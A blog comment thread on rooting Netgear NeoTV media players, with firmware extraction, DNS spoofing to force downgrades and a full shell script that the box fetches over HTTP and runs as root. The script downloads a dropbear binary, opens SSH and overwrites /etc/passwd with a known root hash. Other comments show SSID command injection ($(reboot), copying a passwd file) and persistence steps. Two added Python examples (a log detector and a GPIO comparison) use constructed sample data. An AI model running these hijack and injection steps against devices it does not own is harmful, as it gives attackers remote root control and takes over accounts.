    72986421 0x459AF35 PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
    73070974 0x45AF97E PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
    73187818 0x45CC1EA PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
    73277264 0x45E1F50 PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
    73476751 0x4612A8F PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
    73526927 0x461EE8F PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
    78318935 0x4AB0D57 PNG image, 780 x 870, 8-bit/color RGBA, non-interlaced
    81563280 0x4DC8E90 Squashfs filesystem, little endian, version 4.0, compression: gzip, size: 17109954 bytes, 326 inodes, blocksize: 131072 bytes, created: Wed Oct 3 23:54:51 2012
    98676368 0x5E1AE90 PNG image, 1280 x 720, 8-bit/color RGB, non-interlaced
    98700304 0x5E20C10 PNG image, 720 x 480, 8-bit/color RGB, non-interlaced

    Is what binwalk tells us about the 1.00.58NA.bin image.

  29. Warner Losh says:

    (sorry for the large sized-post: I don’t know how to remove it)

  30. Gary says:

    Hey Craig, it looks like .61 is out and this was back from .48. Have you tried this since the new software? I can’t seem to get the “mfg_test/enable” stuff to stick. After a reset it completely dumps the data.

  31. Warner Losh says:

    BTW, with the .58 firmware, I was able to extract the squashfs image by using

    dd if=NTV300B_V1.00.58NA.bin of=fred bs=1 iseek=4183248
    unsquashfs fred

    It looks like there’s a usr/etc/sdk_config.conf file there. If this is more than just a reference, it might be a good vector of attack since we should be able to replace the squashfs image with our own (assuming we can figure out any checksums on the entire .bin blob) and have an injection attack to get the box to update itself.

    SDK_CONFIG_FACTORY_TEST_MSG_ENABLE = 0
    SDK_CONFIG_FACTORY_TEST_AUTO_DL_SCRIPT = 0
    SDK_CONFIG_FACTORY_TEST_AUTO_DL_SERVER = http://192.168.0.1/
    SDK_CONFIG_FACTORY_TEST_SCRIPT_FILENAME = factory_test.sh

  32. Warner Losh says:

    Oh, and it looks like the update key is encoded in the binary in an easy to read manner. Sweet

  33. kyle says:

    I’m still wondering what the benefits of the jailbreak are… like Android, where you get root access to personalize the phone, and iPhone, where you can tweak your system functions… what does this jailbreak do??? BTW, I just got this, so that’s why I’m curious.

  34. Zaid says:

    Good job… that’s full of win!
    But my question is, do you have the old NeoTV firmware, the one you did the jailbreak on? New firmwares are not vulnerable and I am planning to downgrade.

  35. Zaid says:

    I have managed to downgrade by spoofing DNS, from NTV300SL_V1.0.68 to NTV300SL_V1.0.64, successfully, but I want to try to downgrade to 1.0.48N if someone could provide the firmware image.

    • Craig says:

      I don’t know if it will work for the NTV-300SL, but I have the 1.00.48 firmware for the NTV-300 which you can get here.

      • Zaid says:

        Well, thanks a lot Craig,
        I will see if I can manage to get it to work somehow.
        I have tried to use firmware-mod-kit to extract and rebuild the NTV300SL image without any modification to the filesystem. It calculated the header checksum with no problems, but it wasn’t an exact match of the original. Still thinking about whether I should try to apply the generated firmware or not.

  36. Zaid says:

    Well, I have managed to downgrade to NTV300 on the NTV300SL successfully. Thanks Craig for the firmware you provided.

    I might publish a script to do automatic DNS spoofing and a fileinfo.xml that contains the update version.

    Thanks a lot for your help!

    • Zaid says:

      The exploit worked. Now I am thinking of replacing files through telnet with the SL UI to get the lost advantages back. What do you think, Craig, might it work?

      • Craig says:

        Awesome! Replacing the files should work as long as they reside on a writable partition whose changes are preserved across a reboot.

  37. Pingback: Downgrading NeoTV to 1.0.48 to do jailbreak !! | RaYMaN4EvA

  38. Pingback: Compile “Hello World” over NeoTV 300 ! | RaYMaN4EvA

  39. Brian says:

    Craig: I apologize in advance for such an off topic question, but I’m getting nowhere on the Netgear forums and you obviously know your stuff.

    I have the base model NTV300 and a recent firmware update added DLNA support which my box isn’t supposed to have. I think it was a mistake and now there is another firmware update pending that I haven’t run because I’m afraid it will “patch out” the new “My Media” channel which includes the DLNA sharing. It also includes the ability to browse USB, which my version doesn’t even have, another reason I think the feature was added in error.

    Any idea how I can find out if the firmware with DLNA support was indeed intended for my box? Or to find out if the newest unapplied firmware update will wipe it out?

    Now that I have it I don’t want to lose it. It actually works great … thanks.

    • Craig says:

      One option is to get the latest firmware (a link to the latest firmware image can be found here), find and extract the SquashFS file system using binwalk/firmware-mod-kit, then look to see if there are any executables with the string ‘dlna’ in the name (I’m assuming the dlna binary will have the string ‘dlna’ in it). If so, then the new firmware probably has DLNA support (although it’s no guarantee).

      Since you sound happy with the firmware you have, another option is to trick the NeoTV into thinking that there is no new firmware upgrade. The NeoTVs check for firmware upgrades by requesting a URL from updates1.netgear.com. You could set up a fake DNS server on your network to black hole this domain name, or your router might support blocking web requests based on domain name or keywords. There is a more detailed write up on the firmware upgrade process on rayman’s blog.

      • Wm Brian Savacool says:

        Thanks for the idea ‘Craig’. I did one better. I set up a local web server and gave my router a static DNS mapping to point ‘updates1.netgear.com’ to my web server.

        My web server also has the same folder structure as Netgear’s. I downloaded an earlier version of the firmware. The last one that had DLNA for me was 1.0.76NA. I downloaded and modified ‘fileinfo.xml’. I changed the ‘date’ field in the XML file
        to one day higher than what was already there. Also, I only increased the DATE field in the XML file. I changed the path to the target file to point to 1.076NA and changed the firmware version string to 1.0.77NA.
        I then had the ntv300b poll for updates. It found one, and installed… Bam. I now have DLNA back from 1.076NA.

        • Mike Riebesehl says:

          Brian, I just picked up a NTV for DLNA streaming, but when setting up I was forced into updating to 1.0.78NA, which, like yours, removed that service. Not an IT expert, but I think I can set up that same folder structure on my Mac. By changing the version number I was able to download http://updates1.netgear.com/ntv300b/us/gm/NTV300B_V1.0.76.bin. Still a bit unclear how to create that XML file and redirect the updater to a local server.
          Thanks for any guidance.
          Mike

          • Mike Riebesehl says:

            I figured out how to enable the website and create directories using Apache on my Mac, but my router does not support redirecting the updates1.netgear.com DNS to a local IP. Any suggestions?
            Thank you

          • eenofonn says:

            You can install a local bind9 server and use that to do the name redirection. Have you thought about using the USB method below or does your model not have the USB port?

          • Mike Riebesehl says:

            Yeah, only the NTV300SL has the USB port; that would be an easy solution. Will look into your local bind9 server suggestion. If not, then I can still return it and get the SL or a WD Live Media Player.
            Thanks eenofonn

          • eenofonn says:

            no problem, glad I could point you in the right direction.

        • Adrian says:

          I am currently on 1.1.12 and when I follow your process, it sees the update on my local server, but when I click update, it doesn’t do anything. I am not sure how to find out what it’s doing without cracking it open and hitting the serial connection. Do you know if this process still works?

      • Arkanoid88 says:

        Rayman’s blog appears to be down. Can anybody share a guide on how to do the upgrade/downgrade?

    • Wm Brian Savacool says:

      Don’t install the new firmware. I have the base model too, and they take DLNA/USB away in the next update, 1.078.

  40. Brian says:

    Craig:

    Thanks for the detailed reply. I appreciate it.

  41. Christian Rendon says:

    I lost my remote control and I am using my cellphone app to control it (wired internet). I want to set up my wifi, but without the original remote control it is impossible. The wifi menu activates only if the box is unplugged from the wired network. I guess they didn’t think this would happen, right? What a poor design. Do you know any way to manually set up wifi using the android app through the wired connection?

  42. Rob says:

    I picked up the NTV300SL, (NeoTV Max) yesterday. None of this worked on it, and looking at the SquashFS none of this was present in /root/rc.user on the latest firmware for the device (v1.0.76).

    I managed to get root, though. While sniffing its traffic with wireshark, I noticed it hits a few phone-home URLs on boot. One of these was: http://updates1.netgear.com/ntv300sl/us/gm/web_cmd.sh

    Yes, this apparently does just what you’d expect. I used a local DNS server to point that hostname at a local Linux machine, and then created a /ntv300sl/us/gm/web_cmd.sh script on that server. Lo and behold, it ran it on boot.

    If you’re attempting to do this, I’ll assume you know how to set up the web server and the DNS configuration.

    Here’s the web_cmd.sh:

    cd /tmp
    # pull the dropbear binary from the same server the box already trusts
    curl -O http://updates1.netgear.com/ntv300sl/us/gm/dropbear
    chmod 111 dropbear
    # dropbearmulti picks its function from argv[0], so a symlink gives us dropbearkey
    ln -s dropbear dropbearkey
    ./dropbearkey -t dss -f dropbear_dss_host_key
    ./dropbearkey -t rsa -f dropbear_rsa_host_key
    ./dropbear -d dropbear_dss_host_key -r dropbear_rsa_host_key
    # replace the passwd file so root has a known password hash
    echo "root:vUXETBmux6gC2:0:0:root,,,:/root:/bin/sh" > /etc/passwd

    Grab the armv6l dropbear binary from here: http://landley.net/aboriginal/downloads/binaries/extras/dropbearmulti-armv6l

    Rename it to 'dropbear' and drop it in the directory with web_cmd.sh. Reboot your NTV, wait a bit, and then you should be able to ssh root@ntv.ip.here with a password of "rooted" (set via the crypt hash in web_cmd.sh).

    The init scripts check /mnt/ubi_boot/rc.ntv300 (on this particular device) and execute it if it exists. So, I used this to make the SSH config persistent.

    echo 'cd /mnt/ubi_boot' >/mnt/ubi_boot/rc.ntv300
    echo 'sh dropbear/rc.dropbear' >>/mnt/ubi_boot/rc.ntv300
    mkdir /mnt/ubi_boot/dropbear
    cp /tmp/dropbear /mnt/ubi_boot/dropbear
    cp /tmp/dropbear_dss_host_key /mnt/ubi_boot/dropbear
    cp /tmp/dropbear_rsa_host_key /mnt/ubi_boot/dropbear
    cp /etc/passwd /mnt/ubi_boot/dropbear
    echo 'cd dropbear' > /mnt/ubi_boot/dropbear/rc.dropbear
    echo 'cp passwd /etc' >> /mnt/ubi_boot/dropbear/rc.dropbear
    echo './dropbear -d ./dropbear_dss_host_key -r ./dropbear_rsa_host_key' >> /mnt/ubi_boot/dropbear/rc.dropbear

    Your SSH configuration should now persist across reboots, and you can remove the temporary DNS and web server hacks, and do your thing. Not sure if this will work on other models, but it may. Enjoy!
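The boot-time fetch Rob describes is the security-relevant part: the box pulls a shell script and a binary over plaintext HTTP and runs them as root, so whoever answers for updates1.netgear.com on the LAN runs code on it. As an added example (not code from the post or from Netgear), the script below scans proxy-style log lines for exactly that pattern, flagging even attempts that 404, since the request itself shows the exposure; the log format and the sample lines are constructed.

```python
"""Flag set-top-box phone-home requests that pull runnable content over
plaintext HTTP, as seen in the web_cmd.sh / dropbear fetch described above.

Added example, not part of the original post.  The log format used here
(timestamp, client IP, method, URL, status) and every sample line are
constructed for illustration; adapt LOG_RE to your proxy's real format.
"""
import re
from urllib.parse import urlsplit

# Update host the NTV300 is reported to contact (from the post).
UPDATE_HOSTS = {"updates1.netgear.com"}
# Suffixes that mean "code or firmware the box will run/flash", not a manifest.
EXECUTABLE_SUFFIXES = (".sh", ".bin")
# Bare filenames (no suffix) that the post shows being fetched and executed.
EXECUTABLE_NAMES = {"dropbear"}

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def is_executable_fetch(url):
    """True when url is a plaintext-HTTP request for runnable content from an update host."""
    parts = urlsplit(url)
    if parts.scheme != "http":          # https would at least authenticate the server
        return False
    if parts.hostname not in UPDATE_HOSTS:
        return False
    name = parts.path.rsplit("/", 1)[-1]
    return name.endswith(EXECUTABLE_SUFFIXES) or name in EXECUTABLE_NAMES


def find_script_fetches(lines):
    """Return (timestamp, client, url) for every flagged GET, in log order.
    The HTTP status is deliberately ignored: a 404 still proves the box asked."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m.group("method") != "GET":
            continue
        if is_executable_fetch(m.group("url")):
            hits.append((m.group("ts"), m.group("client"), m.group("url")))
    return hits


# Constructed sample log: one box (192.168.1.50) booting, one unrelated client.
SAMPLE_LOG = """\
2013-01-05T22:30:01 192.168.1.50 GET http://updates1.netgear.com/ntv300sl/us/gm/fileinfo.xml 200
2013-01-05T22:30:02 192.168.1.50 GET http://updates1.netgear.com/ntv300sl/us/gm/web_cmd.sh 404
2013-01-05T22:30:03 192.168.1.50 GET http://updates1.netgear.com/ntv300sl/us/gm/dropbear 404
2013-01-05T22:31:10 192.168.1.23 GET https://www.example.com/index.html 200
2013-01-05T22:32:45 192.168.1.50 GET http://updates1.netgear.com/ntv300b/us/gm/NTV300B_V1.0.76.bin 200
""".splitlines()

if __name__ == "__main__":
    for ts, client, url in find_script_fetches(SAMPLE_LOG):
        print(f"{ts} {client} fetched runnable content over plaintext HTTP: {url}")
```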

    • Zaid says:

      Wow, this one is amazing too! We don’t even need to downgrade now!
      Good job

    • Zaid says:

      Rob.. I got an NTV300SL and updated to 1.0.76, but the script you’ve mentioned was never requested by mine.
      And I tried to listen over serial too to see if it shows up in the debugging; got nothing there too..
      This is totally weird :/

      • Rob says:

        That’s really strange. It only requested it once on boot. While sniffing, can you see it hit any other URLs on that update site?

    • Arkanoid88 says:

      Everything works as advertised on the latest firmware, but when connecting to ssh, the “rooted” password is not recognized anymore. Maybe there was a tweak on /etc/passwd on the latest 1.1.12?

    • Jason says:

      Can’t believe this thing would run a shell script it gets over http *as root* on every boot. What madness!!!

  43. Zaid says:

    Today, I was able to make a custom firmware based on 1.0.76 for the NTV300SL (which was a simple process, only the rootfs squash image was modified) and it has telnet and thttpd (HTTP server).

    Download the custom image from here:

    http://rayman4ever.com/files/ntv/8653_linux_demo_dbg.bin

    To install this image:
    1) get a USB flash drive
    2) make a directory on the root of the flash drive called “UPG”
    3) copy the file 8653_linux_demo_dbg.bin to UPG,
    you should have something like this:
    UPG/8653_linux_demo_dbg.bin
    4) plug the flash drive into the NeoTV
    5) power on the NeoTV
    6) It will ask you to update; accept it.
    That’s it :D

    You can telnet to your NeoTV and use “rooted” as the password for root.
    Netgear did an update to the passwd file, and I couldn’t crack the root password yet.. so I thought I would use Rob’s one ;)

  44. Pingback: NeoTV First Custom firmware | RaYMaN4EvA

  45. Vijay A says:

    I have a quick question for you… I wish to change the HDMI Output setting from HDMI Auto to a fixed value, which is 720p. Unfortunately the Netgear firmware does not have it enabled. Can you please suggest any method of changing it?
    So far I have downloaded the custom firmware from Rayman on my NTV300SL.

    Thanks in advance.

  46. eenofonn says:

    I ended up playing with my NeoTV all night long last night in a fit of “hacker’s insomnia”, as I’m calling it. I’m not exceptionally skilled with embedded Linux or ARM, but I did come up with what I think is a crazy idea last night.

    Is there a way to clone the live system to a file using dd or another tool, so that you could use, say, qemu to emulate the system for more testing/development purposes?

    It would also be nice if there was a wiki/forum where everyone interested in working on this project together could collaborate on thoughts, ideas, etc.

    Oh, and I’m rooted using the UPG USB exploit :) thanks to Zaid

  47. Deepz says:

    Hi guys, can any of you help me? I have mistakenly bought 3 NeoTV 300s from the USA. My main goal was to view my Slingbox on my TV. I was not aware that the NeoTV 300 Max was required for this, neither was I told at the CES show at the Slingbox booth; they only told me to get a Netgear NeoTV, that is it. Now I have 3 NeoTVs which are lying around uselessly. Can any of you help me to install the Slingbox app on it? That’s all I want it to do, watch my Slingbox.
    Thanks in advance

    • thesavo says:

      I just allowed the 1.0.82 update to run. It has a “SLING” app on the main screen. It prompts you for your Slingbox Cloud account.

  48. Athena says:

    Hey guys, I am really, really new to this whole media box stuff. I have been running XBMC on my computer but want to get it onto my TV. My dad picked me up a NeoTV NTV300, so I guess I’m wondering: if I jailbreak it, can I run XBMC, or can I get it to use this WiDi thing I have read about in the higher-end NTV300 boxes via some hack? Thanks in advance!

  49. bender says:

    Can you make a video? Because it doesn’t work for me. Please, I need help, thx.

  51. randomguy says:

    Just thought I’d add to this: in Canada, the file path is ntv300b/ca/gm/fileinfo.xml etc. (note the ca).

    DD-WRT on my router, dnsmasq pointing to your web server, and the usual files, and you’re gold.

  52. Jig says:

    Instructions posted by Rob at January 5, 2013 at 10:36 pm still work (even with the latest firmware!). I’m in.

    # uname -a
    Linux NTGR_NTV300 2.6.35 #1 PREEMPT Fri Feb 22 18:32:52 CST 2013 armv6l GNU/Linux

  53. Jig says:

    Anyone know how to remap the CUSTOM keys? (such as the ones for Netflix, Hulu, etc). I want to map one of the keys to another program that would be used more often than say VUDU for example. Maybe replace VUDU with Intel WiDi as a shortcut for example. I’ve tried snooping around, but couldn’t find anything. Looks like it uses LIRC for receiving remote control strokes, and there is a lirc_monitor that you can run to see the key sequences being received. But wasn’t able to track down where the actual mapping of the keys occurs. (typical lircd would just be in lircd.conf but looks like they’ve hard coded the key mapping into a binary somewhere).

  54. Bill Cullen says:

    Craig this is great. You did a great job. I have to ask, because I am new to this, can I add XBMC to the menu screen using this method. If so, how? Do I just add the Linux script from XBMCHUB.com or is there some other way? Thanks

  55. Kyle G says:

    I live in Canada and my NTV300 does not come with Hulu Plus. Is there a way I can get the American firmware on my device, or another way to add Hulu Plus to it?

    • Andy Burn says:

      You need to use an American proxy. Your IP gives you away as living in Canada. Try xroxy dot com. I use the paid service for other applications, and have done for 3 years now :)

  57. Andy Burn says:

    Does anyone have this firmware still, that they wouldn’t mind sending me?
    Many thanks,
    Andy
    download custom image from here:

    http://rayman4ever.com/files/ntv/8653_linux_demo_dbg.bin

  58. Martin says:

    Hello, I have an NTV Max and I need to know if I can add new channels to my device; if it’s possible, how can I do it? THX.

  59. gabo says:

    Great info. I had my NTV300 (not the S or SL version) with no DLNA client feature available; I downgraded the firmware to 1.0.76NA, and it worked like a charm, now I have DLNA support. Mine was already at the latest firmware version, so downgrading to that low version is not a problem. But still wondering why the DLNA feature is not included in the latest firmware!

    • Urkeytay says:

      Just curious if you would be able to make up a step by step on how to downgrade this? I would really like to have DLNA support on this device. I am not a novice by any means, but when it comes to things like this, I may need a little step by step.

      Any help is much appreciated!

  60. Badri says:

    Hi, Do you know by any chance, what software is used in the remote for this device. I want to create a windows phone app. My remote is not working properly.

    Any info is appreciated.

    Thank you.

  61. Stephan says:

    I just tried this on the Neo NTV300SL with the latest firmware as of the date of this comment (1.1.50NA). Just using backticks did not work to inject system commands.
    You have to escape the backticks for it to work on my device.

    For example: to reboot my Neo I have to set the SSID to

    \`reboot\`

    I’ve worked through your script but creating the ‘enable’ file didn’t result in any change on the device. I’ll have a peek at the firmware files. Thanks for getting me started!

  62. GERMAN says:

    How can you do all the same steps for the NEO TV NTV 200?

    The `reboot` trick does not work on this one.

  63. Pingback: Rozpruwanie firmware-ów urządzeń sieciowych

  64. r1der1 says:

    Hi Craig, is it possible to install XBMC on the NTV300?

  65. joe_sizlack says:

    That was an impressive display of badassery. My hat is off to you, sir.

  66. mhaya says:

    I was trying to see if I can download a browser on this device, the Netgear NTV300, but was not able to. Is there an easy way out, or do I have to purchase the Google box?

  67. Kilroy says:

    Very good idea, and seeing as I have one of these I gave it a shot with minimal success. Here is what I did and how far I got.

    Using the quotes with “reboot” did not work, but $(reboot) however did work. I accessed the serial port and spawned the unfriendly shell. But I noticed a few things are missing, specifically the inetd binary. telnetd is present, but without the superserver it won’t run. I overwrote /etc/passwd using the SSID exploit to give root a blank password and typed “login” in the shell. Username: root, and it dropped me into a root shell. I copied utelnetd onto the device and was able to telnet in, but nothing persists across reboots. Seems everything I do in pretty much any directory gets reset on reboot. Any new files get erased, any file changes get reset, and I can’t seem to find any directory that persists. If someone could explain how I could possibly build a custom firmware, or any other ideas, I would be very grateful.

  68. ColtB45 says:

    I discovered that if you change gpio 63 to 1 it makes the getHWID utility think the B is a SL.

    getHWID # Check unit type, 0 = Basic, 1 = S, 2 = SL(MAX)
    0 # Basic unit
    gpio_prog 63 1 1 #[address] [0 = read / 1 = set] [If set, data]
    [APP]Gpio 63 input data is: 0 # gpio 63 is currently 0
    [APP]Gpio 63 select: 0 # IDK
    [APP]Gpio 63 output data is: 1 # gpio 63 was successfully set to 1
    getHWID
    2 # the unit is now detected as a SL (MAX)

    This still doesn’t work for fooling ntv300ui. It still detects that it’s not a MAX unit. It also doesn’t persist across reboots.

    Would someone who has access to a S or SL unit please run the following and post the results here? This will retrieve the state of GPIO (it will not alter it). FYI, reading the high numbered GPIOs caused my unit to reset although it didn’t harm anything.

    Commands to run (please copy and paste the results here):
    # read pins 0 through 113, one gpio_prog N 0 per pin
    i=0
    while [ $i -le 113 ]; do
        gpio_prog $i 0
        i=$((i+1))
    done

    I ran this on my B unit and got the following:
    [APP]Gpio 0 input data is: 1
    [APP]Gpio 1 input data is: 1
    [APP]Gpio 2 input data is: 1
    [APP]Gpio 3 input data is: 1
    [APP]Gpio 4 input data is: 1
    [APP]Gpio 5 input data is: 0
    [APP]Gpio 6 input data is: 0
    [APP]Gpio 7 input data is: 1
    [APP]Gpio 8 input data is: 1
    [APP]Gpio 9 input data is: 1
    [APP]Gpio 10 input data is: 1
    [APP]Gpio 11 input data is: 0
    [APP]Gpio 12 input data is: 0
    [APP]Gpio 13 input data is: 0
    [APP]Gpio 14 input data is: 0
    [APP]Gpio 15 input data is: 1
    [APP]Gpio 16 input data is: 0
    [APP]Gpio 17 input data is: 0
    [APP]Gpio 18 input data is: 1
    [APP]Gpio 19 input data is: 1
    [APP]Gpio 20 input data is: 0
    [APP]Gpio 21 input data is: 0
    [APP]Gpio 22 input data is: 0
    [APP]Gpio 23 input data is: 0
    [APP]Gpio 24 input data is: 0
    [APP]Gpio 25 input data is: 0
    [APP]Gpio 26 input data is: 0
    [APP]Gpio 27 input data is: 0
    [APP]Gpio 28 input data is: 0
    [APP]Gpio 29 input data is: 1
    [APP]Gpio 30 input data is: 1
    [APP]Gpio 31 input data is: 0
    [APP]Gpio 32 input data is: 1
    [APP]Gpio 33 input data is: 1
    [APP]Gpio 34 input data is: 0
    [APP]Gpio 35 input data is: 0
    [APP]Gpio 36 input data is: 0
    [APP]Gpio 37 input data is: 1
    [APP]Gpio 38 input data is: 1
    [APP]Gpio 39 input data is: 1
    [APP]Gpio 40 input data is: 0
    [APP]Gpio 41 input data is: 0
    [APP]Gpio 42 input data is: 0
    [APP]Gpio 43 input data is: 0
    [APP]Gpio 44 input data is: 0
    [APP]Gpio 45 input data is: 0
    [APP]Gpio 46 input data is: 0
    [APP]Gpio 47 input data is: 0
    [APP]Gpio 48 input data is: 0
    [APP]Gpio 49 input data is: 0
    [APP]Gpio 50 input data is: 0
    [APP]Gpio 51 input data is: 0
    [APP]Gpio 52 input data is: 0
    [APP]Gpio 53 input data is: 1
    [APP]Gpio 54 input data is: 0
    [APP]Gpio 55 input data is: 0
    [APP]Gpio 56 input data is: 0
    [APP]Gpio 57 input data is: 1
    [APP]Gpio 58 input data is: 1
    [APP]Gpio 59 input data is: 0
    [APP]Gpio 60 input data is: 0
    [APP]Gpio 61 input data is: 1
    [APP]Gpio 62 input data is: 1
    [APP]Gpio 63 input data is: 0
    [APP]Gpio 64 input data is: 0
    [APP]Gpio 65 input data is: 1
    [APP]Gpio 66 input data is: 0
    [APP]Gpio 67 input data is: 0
    [APP]Gpio 68 input data is: 0
    [APP]Gpio 69 input data is: 1
    [APP]Gpio 70 input data is: 1
    [APP]Gpio 71 input data is: 1
    [APP]Gpio 72 input data is: 1
    [APP]Gpio 73 input data is: 1
    [APP]Gpio 74 input data is: 1
    [APP]Gpio 75 input data is: 0
    [APP]Gpio 76 input data is: 0
    [APP]Gpio 77 input data is: 1
    [APP]Gpio 78 input data is: 1
    [APP]Gpio 79 input data is: 1
    [APP]Gpio 80 input data is: 0
    [APP]Gpio 81 input data is: 0
    [APP]Gpio 82 input data is: 0
    [APP]Gpio 83 input data is: 0
    [APP]Gpio 84 input data is: 0
    [APP]Gpio 85 input data is: 0
    [APP]Gpio 86 input data is: 0
    [APP]Gpio 87 input data is: 1
    [APP]Gpio 88 input data is: 1
    [APP]Gpio 89 input data is: 0
    [APP]Gpio 90 input data is: 0
    [APP]Gpio 91 input data is: 0
    [APP]Gpio 92 input data is: 0
    [APP]Gpio 93 input data is: 0
    [APP]Gpio 94 input data is: 1
    [APP]Gpio 95 input data is: 1
    [APP]Gpio 96 input data is: 0
    [APP]Gpio 97 input data is: 0
    [APP]Gpio 98 input data is: 0
    [APP]Gpio 99 input data is: 0
    [APP]Gpio 100 input data is: 0
    [APP]Gpio 101 input data is: 0
    [APP]Gpio 102 input data is: 0
    [APP]Gpio 103 input data is: 0
    [APP]Gpio 104 input data is: 0
    [APP]Gpio 105 input data is: 0
    [APP]Gpio 106 input data is: 0
    [APP]Gpio 107 input data is: 0
    [APP]Gpio 108 input data is: 0
    [APP]Gpio 109 input data is: 0
    [APP]Gpio 110 input data is: 1
    [APP]Gpio 111 input data is: 1
    [APP]Gpio 112 input data is: 1
    [APP]Gpio 113 input data is: 1

    Thanks,
    ColtB45
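ColtB45 is asking for S/SL readings to compare against the B-unit dump above. As an added example (not code from the post), the script below parses gpio_prog output in the “[APP]Gpio N input data is: X” form and reports the pins that differ between two dumps; the B-unit lines are copied from the post, while the SL lines are constructed for illustration and are not a real reading.

```python
"""Compare two gpio_prog read-outs pin by pin (B unit vs. S/SL unit).

Added example, not part of the original post.  B_UNIT below is copied from
the dump posted above (pins 60-66 only, to keep this short);
SL_UNIT_CONSTRUCTED is invented for illustration and is NOT a real reading.
"""
import re

# Only the "input data" lines carry a pin reading; "select" / "output data"
# chatter from gpio_prog is ignored on purpose.
GPIO_RE = re.compile(r"\[APP\]Gpio (\d+) input data is: ([01])")


def parse_gpio_dump(text):
    """Map pin number -> level (0/1).  Non-matching lines are skipped and a pin
    reported twice keeps its last value, so a raw serial capture can be fed in."""
    pins = {}
    for m in GPIO_RE.finditer(text):
        pins[int(m.group(1))] = int(m.group(2))
    return pins


def diff_gpio(dump_a, dump_b):
    """Return ({pin: (level_a, level_b)} for pins that differ,
    sorted list of pins reported by only one of the two dumps)."""
    a, b = parse_gpio_dump(dump_a), parse_gpio_dump(dump_b)
    common = a.keys() & b.keys()
    changed = {p: (a[p], b[p]) for p in sorted(common) if a[p] != b[p]}
    missing = sorted((a.keys() | b.keys()) - common)
    return changed, missing


# Pins 60-66 of the B unit, exactly as posted above.
B_UNIT = """\
[APP]Gpio 60 input data is: 0
[APP]Gpio 61 input data is: 1
[APP]Gpio 62 input data is: 1
[APP]Gpio 63 input data is: 0
[APP]Gpio 64 input data is: 0
[APP]Gpio 65 input data is: 1
[APP]Gpio 66 input data is: 0
"""

# CONSTRUCTED stand-in for an SL reading: pin 63 high (matching the getHWID
# observation above), pin 64 high, and pin 66 not reported (e.g. unit reset).
SL_UNIT_CONSTRUCTED = """\
[APP]Gpio 60 input data is: 0
[APP]Gpio 61 input data is: 1
[APP]Gpio 62 input data is: 1
[APP]Gpio 63 input data is: 1
[APP]Gpio 64 input data is: 1
[APP]Gpio 65 input data is: 1
"""

if __name__ == "__main__":
    changed, missing = diff_gpio(B_UNIT, SL_UNIT_CONSTRUCTED)
    for pin, (lvl_b, lvl_sl) in changed.items():
        print(f"gpio {pin}: B={lvl_b} SL={lvl_sl}")
    if missing:
        print("pins reported by only one unit:", missing)
```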

  69. Kilroy says:

    ColtB45
    Here it is for a 300SL
    http://pastebin.com/MHXkLAj9

    Also, I did find one directory that persists across reboots for me.
    It is /cust_part_1
    Haven’t had much time to play with this, but I was able to create files in that directory that persisted across reboots, so I can execute scripts from the ESSID via the $() exploit, but I still haven’t found a way to execute something on boot.
    I have to run
    $(cp /cust_part_1/passwd /etc) #copies a passwd file with a blank root password
    $(sh) #spawns a non-interactive shell on the serial console
    then in minicom I type “login” (I found that if you leave the screen on the one you type the ESSID in, it was less likely to drop random characters),
    put root in as the user, and it drops into a shell. Unfortunately typing login blanks the screen on the TV, so it can’t be used once login is typed.
    Or I can execute a copy of utelnetd I have saved in the cust_part_1 directory and log in remotely through telnet, and the regular screen stays up. Though plugging it into an ethernet cord after executing $(sh) tends to make connecting easier.

  70. PB says:

    Is there any way to revive a bricked NeoTV 300 box? Mine got a new update, and when it came back it was stuck on the NeoTV logo.

    • ColtB45 says:

      I don’t see any reason you couldn’t TFTP and flash a complete firmware image to it via U-Boot console. I could dump such an image if you want to try.

      • Tim says:

        Hell yeah. My 300SL bricked on an update last week. Now I just get the logo screen at startup. Any help would be hugely appreciated. Thanks for all your work so far!

  71. Mathew Kirschbaum says:

    So what would be the current method of jailbreaking the B version?
